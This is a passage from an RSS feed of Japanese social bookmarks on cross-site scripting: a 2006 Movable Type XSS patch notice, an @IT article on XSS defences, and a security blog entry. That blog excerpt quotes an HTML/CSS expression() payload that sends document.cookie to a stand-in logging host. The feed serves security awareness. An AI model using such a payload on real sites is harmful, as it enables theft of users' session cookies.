 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>life</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>crosesite</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/life"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/crosesite"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.sixapart.jp%2Fmovabletype%2Fnews%2F2006%2F09%2F26-1115.html&amp;title=Six%20Apart%20-%20Movable%20Type%20News%3A%20%E3%80%90%E9%87%8D%E8%A6%81%E3%80%91%20Movable%20Type%20%E6%96%B0%E3%83%90%E3%83%BC%E3%82%B8%E3%83%A7%E3%83%B3%E3%81%A8%E3%83%91%E3%83%83%E3%83%81%E3%81%AE%E6%8F%90%E4%BE%9B%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6">
 <title>Six Apart - Movable Type News: 【重要】 Movable Type 新バージョンとパッチの提供について</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.sixapart.jp%2Fmovabletype%2Fnews%2F2006%2F09%2F26-1115.html&amp;title=Six%20Apart%20-%20Movable%20Type%20News%3A%20%E3%80%90%E9%87%8D%E8%A6%81%E3%80%91%20Movable%20Type%20%E6%96%B0%E3%83%90%E3%83%BC%E3%82%B8%E3%83%A7%E3%83%B3%E3%81%A8%E3%83%91%E3%83%83%E3%83%81%E3%81%AE%E6%8F%90%E4%BE%9B%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6</link>
 
  
   <description>
     <![CDATA[
       Movable Type 4 Publishing Platform パートナーサイトマップお問い合わせsix apart ホーム機能・特徴ご購入方法関連コンテンツ導入事例よくある質問・お問い合わせMovable Type News前のページへメイン次のページへ2006年09月26日【重要】 Movable Type 新バージョンとパッチの提供についてMovable Typeユーザーの皆様Movable Typeのプログラムにおいてクロスサイトスクリプティングによる脆弱性が確認されました。対策を施した新バージョンをリリースいたします。概要：<br />Movable Typeの管理画面、検索機能、コメント機能においてクロスサイトスクリプティングの脆弱性があることを、発見された方よりご指摘頂き、弊社にて確認いたしました。影響のあるバージョン：<br />現在、Movable Type 3.2以降およびMovable Type Enterpriseにおいてこの脆弱性があることを確認しております。一部の脆弱性については、それ以前のバージョンにも含まれる可能性があります。対処方法：<br />9/26　11:15より、対策を施したMovable Typ...
       <a href="http://www.sixapart.jp/movabletype/news/2006/09/26-1115.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.sixapart.jp%2Fmovabletype%2Fnews%2F2006%2F09%2F26-1115.html&amp;title=Six%20Apart%20-%20Movable%20Type%20News%3A%20%E3%80%90%E9%87%8D%E8%A6%81%E3%80%91%20Movable%20Type%20%E6%96%B0%E3%83%90%E3%83%BC%E3%82%B8%E3%83%A7%E3%83%B3%E3%81%A8%E3%83%91%E3%83%83%E3%83%81%E3%81%AE%E6%8F%90%E4%BE%9B%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.sixapart.jp/movabletype/news/2006/09/26-1115.html</dc:source>
 <dc:identifier>24884</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2006-09-26T06:14:29Z</dc:date>
 <dc:subject>blog</dc:subject>
 <dc:subject>security</dc:subject>
 <dc:subject>movabletype</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>update</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/blog"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/movabletype"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/update"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffsecurity%2Fspecial%2F30xss%2Fxss01.html&amp;title=%EF%BC%A0IT%EF%BC%9A%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96%E3%81%AE%E5%9F%BA%E6%9C%AC">
 <title>＠IT：クロスサイトスクリプティング対策の基本</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffsecurity%2Fspecial%2F30xss%2Fxss01.html&amp;title=%EF%BC%A0IT%EF%BC%9A%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96%E3%81%AE%E5%9F%BA%E6%9C%AC</link>
 
  
   <description>
     <![CDATA[
       ＠IT＠IT テクノロジー＠IT情報マネジメント＠IT MONOist＠IT自分戦略研究所JOB＠ITITmediaTechTarget誠                        ＠IT総合トップ &gt; テクノロジー &gt; Security&amp;Trust &gt; クロスサイトスクリプティング対策の基本　                                                 <BR>        【特集】<br />        Webアプリケーションにセキュリティホールを作らないための<br />        クロスサイトスクリプティング対策の基本（前編）<br />        〜クロスサイトスクリプティング脆弱性とは？〜        国分裕<br />        三井物産GTI （現：三井物産セキュアディレクション株式会社）<br />        2002/11/9             　最近Webアプリケーションに存在するセキュリティホールが注目を浴びている。その中でも「クロスサイトスクリプティング」と呼ばれる脆弱性が有名であるが、クロスサイトスクリプティング脆弱性について正確に理解している人が依然と...
       <a href="http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffsecurity%2Fspecial%2F30xss%2Fxss01.html&amp;title=%EF%BC%A0IT%EF%BC%9A%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96%E3%81%AE%E5%9F%BA%E6%9C%AC">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html</dc:source>
 <dc:identifier>34616</dc:identifier>
 <dc:creator>fairy</dc:creator>
 <dc:date>2007-04-01T01:09:10Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhoshikuzu%2F20060710%23ONWINIEIE&amp;title=hoshikuzu%20%7C%20star_dust%20%E3%81%AE%E6%9B%B8%E6%96%8E%20-%20cookie%E3%82%92%E3%81%8A%E9%A0%90%E3%81%8B%E3%82%8A%E3%81%97%E3%81%BE%E3%81%99%3A%20%E6%82%AA%E6%84%8F%E3%81%82%E3%82%8B%E5%85%B1%E5%90%8C%E9%A0%90%E3%81%8B%E3%82%8A%E6%89%80">
 <title>hoshikuzu | star_dust の書斎 - cookieをお預かりします: 悪意ある共同預かり所</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhoshikuzu%2F20060710%23ONWINIEIE&amp;title=hoshikuzu%20%7C%20star_dust%20%E3%81%AE%E6%9B%B8%E6%96%8E%20-%20cookie%E3%82%92%E3%81%8A%E9%A0%90%E3%81%8B%E3%82%8A%E3%81%97%E3%81%BE%E3%81%99%3A%20%E6%82%AA%E6%84%8F%E3%81%82%E3%82%8B%E5%85%B1%E5%90%8C%E9%A0%90%E3%81%8B%E3%82%8A%E6%89%80</link>
 
  
   <description>
     <![CDATA[
                       最新の日記    記事一覧    ユーザー登録    ログイン    ヘルプ  hoshikuzu | star_dust の書斎  ポチクズの書斎BlogPethoshikuzu|star_dustの日記について書く内容の方針とかはフラフラしているのです。あまり考えていないかも知れません。面白いなぁと思うこと、大事なことだなぁと思うことを書いています。あんまり悲しいことは書かない主義。&lt;前の日 | 次の日&gt;2006-07-10■cookieをお預かりします: 悪意ある共同預かり所   &lt;html&gt;&lt;body&gt;&lt;style type=&quot;text/css&quot;&gt;h1 {  background#:/&#42;;&#42;/expression(&#39;url(http://commonevillogger.example.com/log.php&#39;+document.cookie+&#39;)&#39;);}&lt;/style&gt;&lt;h1&gt;heading&lt;/h1&gt;&lt;/body...
       <a href="http://d.hatena.ne.jp/hoshikuzu/20060710#ONWINIEIE">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhoshikuzu%2F20060710%23ONWINIEIE&amp;title=hoshikuzu%20%7C%20star_dust%20%E3%81%AE%E6%9B%B8%E6%96%8E%20-%20cookie%E3%82%92%E3%81%8A%E9%A0%90%E3%81%8B%E3%82%8A%E3%81%97%E3%81%BE%E3%81%99%3A%20%E6%82%AA%E6%84%8F%E3%81%82%E3%82%8B%E5%85%B1%E5%90%8C%E9%A0%90%E3%81%8B%E3%82%8A%E6%89%80">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/hoshikuzu/20060710#ONWINIEIE</dc:source>
 <dc:identifier>10184</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2006-07-10T01:57:01Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

</rdf:RDF>
